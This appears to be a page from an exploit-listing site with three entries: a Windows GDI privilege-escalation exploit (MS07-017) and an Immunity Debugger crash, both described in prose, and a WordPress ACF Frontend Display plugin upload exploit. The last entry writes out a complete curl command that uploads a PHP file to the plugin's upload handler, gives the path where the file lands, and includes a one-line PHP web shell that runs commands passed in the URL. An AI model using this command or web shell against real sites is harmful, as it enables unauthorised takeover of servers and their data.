header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)

This exploit allows an attacker to elevate their privileges on a local system. The exploit takes advantage of a vulnerability in the GDI (Graphics Device Interface) component of Windows. By executing code with kernel privilege, the attacker can gain control over the system. The exploit was developed using Dev-C++ 4.9.9.2 and linked with /lib/libgdi32.a. For more information, refer to the references provided.

Immunity Debugger – Crash

The vulnerability exists in Immunity Debugger v1.85. It is caused by incorrect path/file extension parsing. By creating a folder with the name .exe.exe and placing any program inside, or by trying to debug an executable with the name test.exe.exe or lib.exe.dll, it is possible to trigger a crash. This is due to the 'OpenEXEfile' function not checking if the return value of strchr() is zero.

WP Plugin Free ACF Frontend Display File Upload Vulnerability

+---------------------------------------------------------------------------+#[+] Author: TUNISIAN CYBER#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability#[+] Date: 3-07-2015#[+] Type: WebAPP#[+] Download Plugin: https://downloads.wordpress.org/plugin/acf-frontend-display.2.0.5.zip#[+] Tested on: KaliLinux#[+] Friendly Sites: sec4ever.com#[+] Twitter: @TCYB3R+---------------------------------------------------------------------------+curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"File Path: site/wp-content/uploads/uigen_YEAR/file.phpExample: site/wp-content/uploads/uigen_2015/evil.phpevil.php: <?php passthru($_GET['cmd']); ?>TUNISIAN CYBER(miutex)-S4E

Recent Exploits: